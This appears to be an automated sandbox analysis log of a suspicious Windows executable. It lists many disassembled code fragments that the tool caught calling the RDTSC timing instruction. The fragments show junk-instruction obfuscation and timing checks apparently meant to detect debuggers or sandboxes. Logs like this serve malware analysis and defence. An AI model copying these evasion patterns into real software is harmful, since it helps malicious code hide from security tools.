Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C199 second address: 127C1B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F80D77651h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C891 second address: 127C8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F1F81013DA8h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1F81013DABh 0x00000014 jmp 00007F1F81013DAAh 0x00000019 pushad 0x0000001a jl 00007F1F81013DA6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F530 second address: 127F534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F5FF second address: 127F60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DAAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F60E second address: 127F613 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F613 second address: 127F6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, esi 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F1F81013DA8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D36E4h] 0x0000002c call 00007F1F81013DA9h 0x00000031 pushad 0x00000032 push edx 0x00000033 jns 00007F1F81013DA6h 0x00000039 pop edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 je 00007F1F81013DBDh 0x00000048 push esi 0x00000049 jmp 00007F1F81013DB5h 0x0000004e pop esi 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 jmp 00007F1F81013DB5h 0x00000058 mov eax, dword ptr [eax] 0x0000005a jmp 00007F1F81013DB9h 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F6BE second address: 127F6C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F6C2 second address: 127F740 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D21C8h], ebx 0x0000000e push 00000003h 0x00000010 mov esi, edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1F81013DA8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edx, 2C2E682Fh 0x00000033 push 00000003h 0x00000035 cmc 0x00000036 push E38EA65Fh 0x0000003b jp 00007F1F81013DBAh 0x00000041 jmp 00007F1F81013DB4h 0x00000046 xor dword ptr [esp], 238EA65Fh 0x0000004d mov edx, dword ptr [ebp+122D3738h] 0x00000053 lea ebx, dword ptr [ebp+1244E45Ch] 0x00000059 add ch, 00000005h 0x0000005c xchg eax, ebx 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 jp 00007F1F81013DA6h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F740 second address: 127F75D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F80D7764Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127F7A8 second address: 127F7F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F1F81013DBBh 0x0000000f nop 0x00000010 mov ch, dl 0x00000012 push 00000000h 0x00000014 jmp 00007F1F81013DB9h 0x00000019 push 18877672h 0x0000001e push eax 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12917DC second address: 12917E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129FBE6 second address: 129FBF0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F81013DB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126C9BA second address: 126C9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnc 00007F1F80D77646h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F1F80D77646h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129DC84 second address: 129DC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129DF37 second address: 129DF46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F1F80D77646h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E07E second address: 129E099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E805 second address: 129E81E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F1F80D7764Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127507A second address: 12750A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F1F81013DAAh 0x0000000b jmp 00007F1F81013DB7h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129EC47 second address: 129EC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129EC56 second address: 129EC66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F30E second address: 129F312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F5D6 second address: 129F5E4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F5E4 second address: 129F5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F5E8 second address: 129F5EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F5EC second address: 129F625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D77657h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c jc 00007F1F80D77660h 0x00000012 push eax 0x00000013 jmp 00007F1F80D77652h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F755 second address: 129F769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DAEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129FA65 second address: 129FA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129FA6A second address: 129FA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F1F81013DACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A76EA second address: 12A76F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A76F1 second address: 12A76F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1273615 second address: 127364B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D77655h 0x00000009 jmp 00007F1F80D77659h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAE36 second address: 12AAE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F81013DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAE40 second address: 12AAE61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F80D77658h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA454 second address: 12AA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA45A second address: 12AA468 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA468 second address: 12AA46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA46E second address: 12AA472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA5EE second address: 12AA600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA600 second address: 12AA604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA604 second address: 12AA616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F1F81013DA6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA616 second address: 12AA622 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F80D7764Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA783 second address: 12AA787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AE602 second address: 12AE60F instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AE6CD second address: 12AE6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AE6D3 second address: 12AE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F80D7764Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEB4C second address: 12AEB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEC3D second address: 12AEC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jo 00007F1F80D77646h 0x00000014 popad 0x00000015 je 00007F1F80D7764Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF090 second address: 12AF096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF096 second address: 12AF09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF09C second address: 12AF0AF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF0AF second address: 12AF0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF6D9 second address: 12AF6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF6DD second address: 12AF74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1F80D77658h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F1F80D77648h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F1F80D77648h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov edi, 5F596691h 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D2008h], edx 0x00000050 xchg eax, ebx 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pop esi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF74E second address: 12AF760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jns 00007F1F81013DA6h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF760 second address: 12AF765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B00CF second address: 12B00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1F81013DABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B00EA second address: 12B00EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B0819 second address: 12B081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1803 second address: 12B1807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B081E second address: 12B0823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B23A2 second address: 12B23B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77652h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B5BD5 second address: 12B5BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BB584 second address: 12BB588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BB588 second address: 12BB5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F81013DB2h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BBB31 second address: 12BBB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF401 second address: 12BF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02B1 second address: 12C02B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF517 second address: 12BF549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F81013DB7h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F81013DB0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02B5 second address: 12C02D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F1F80D77646h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF549 second address: 12BF553 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02D0 second address: 12C02E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02E2 second address: 12C02E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF635 second address: 12BF63E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1300 second address: 12C1304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1304 second address: 12C130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C0497 second address: 12C0518 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007F1F81013DACh 0x00000010 mov dword ptr [ebp+122D2659h], eax 0x00000016 sub dword ptr [ebp+12449C3Eh], ecx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+12475F77h], ebx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 xor di, 2E20h 0x00000035 mov eax, dword ptr [ebp+122D0475h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F1F81013DA8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 cmc 0x00000056 push FFFFFFFFh 0x00000058 mov bx, B756h 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F1F81013DB9h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C130A second address: 12C1346 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F1F80D77648h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov di, ax 0x00000028 push 00000000h 0x0000002a cld 0x0000002b push 00000000h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push edi 0x00000033 pop edi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1346 second address: 12C134A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C134A second address: 12C1350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1350 second address: 12C135F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C2266 second address: 12C226C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C226C second address: 12C22D2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jo 00007F1F81013DB4h 0x00000013 jmp 00007F1F81013DAEh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F1F81013DA8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 jmp 00007F1F81013DACh 0x00000039 push 00000000h 0x0000003b add edi, 531525EDh 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jl 00007F1F81013DA6h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C22D2 second address: 12C22D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C15B5 second address: 12C15DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F1F81013DAEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
